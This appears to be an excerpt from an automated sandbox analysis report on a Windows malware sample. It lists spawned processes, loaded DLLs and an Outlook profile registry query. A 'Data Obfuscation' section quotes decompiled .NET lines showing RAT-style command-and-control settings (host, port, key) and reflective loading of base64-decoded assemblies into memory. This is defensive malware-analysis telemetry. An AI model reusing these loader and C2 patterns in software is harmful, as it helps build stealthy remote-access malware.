                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: oledlg.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: oledlg.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msftedit.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: comsvcs.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmlua.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmutil.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\dllhost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: msimg32.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: oleacc.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: oledlg.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: dbghelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: pla.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: pdh.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: tdh.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: cabinet.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: wevtapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: shdocvw.dll
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: uhlqevxks.14.drLNK file: ..\..\..\..\user\AppData\Local\Temp\SendBugReportNew.exe
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Windows\SysWOW64\msftedit.dll
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\OutlookJump to behavior
                      Source: file.exeStatic file information: File size 2594056 > 1048576
                      Source: Binary string: wkernel32.pdb source: V3.exe, 0000000A.00000003.1325524956.00000000046F0000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325445545.00000000010D0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329816616.0000000004CF0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329733550.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: V3.exe, 0000000A.00000003.1325726282.0000000004670000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325910067.0000000004890000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1330348319.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1330078113.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: V3.exe, 0000000A.00000003.1324630716.0000000004670000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1324825043.0000000004860000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1328177048.0000000004DC0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1327943327.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: SendBugReportNew.exe, 00000009.00000002.1404881982.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404526602.000000000306B000.00000004.00000020.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325063351.0000000004670000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325220783.0000000004810000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329265416.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329541832.0000000004D70000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686777775.0000000004D58000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1687023022.00000000051F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: V3.exe, 0000000A.00000003.1324630716.0000000004670000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1324825043.0000000004860000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1328177048.0000000004DC0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1327943327.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: SendBugReportNew.exe, 00000009.00000002.1404881982.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404526602.000000000306B000.00000004.00000020.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325063351.0000000004670000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325220783.0000000004810000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329265416.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329541832.0000000004D70000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686777775.0000000004D58000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1687023022.00000000051F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: win32u.pdb source: wmplayer.exe
                      Source: Binary string: wkernel32.pdbUGP source: V3.exe, 0000000A.00000003.1325524956.00000000046F0000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325445545.00000000010D0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329816616.0000000004CF0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329733550.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: V3.exe, 0000000A.00000003.1325726282.0000000004670000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325910067.0000000004890000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1330348319.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1330078113.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: cfi.14.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: cfi.14.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 14.2.cmd.exe.59800c8.8.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 14.2.cmd.exe.59800c8.8.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: tqco.32.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: tqco.32.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: cfi.14.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: cfi.14.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: cfi.14.dr, Messages.cs.Net Code: Memory
                      Source: 14.2.cmd.exe.59800c8.8.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: 14.2.cmd.exe.59800c8.8.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: 14.2.cmd.exe.59800c8.8.raw.unpack, Messages.cs.Net Code: Memory
                      Source: 17.3.OpenWith.exe.1f6665ad970.1.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 17.3.OpenWith.exe.1f6665ad970.1.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 17.3.OpenWith.exe.1f6665ad970.4.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 17.3.OpenWith.exe.1f6665ad970.4.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 17.3.OpenWith.exe.1f6665ad970.0.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 17.3.OpenWith.exe.1f6665ad970.0.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 17.2.OpenWith.exe.1f6665ad970.2.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 17.2.OpenWith.exe.1f6665ad970.2.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 17.3.OpenWith.exe.1f6665ad970.5.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 17.3.OpenWith.exe.1f6665ad970.5.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 17.2.OpenWith.exe.1f665dac830.1.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 17.2.OpenWith.exe.1f665dac830.1.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 17.3.OpenWith.exe.1f6665ad970.3.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 17.3.OpenWith.exe.1f6665ad970.3.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: 17.3.OpenWith.exe.1f6665ad970.2.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                      Source: 17.3.OpenWith.exe.1f6665ad970.2.raw.unpack, Runtime.cs.Net Code: CoreMain
                      Source: tqco.32.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: tqco.32.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: tqco.32.dr, Messages.cs.Net Code: Memory
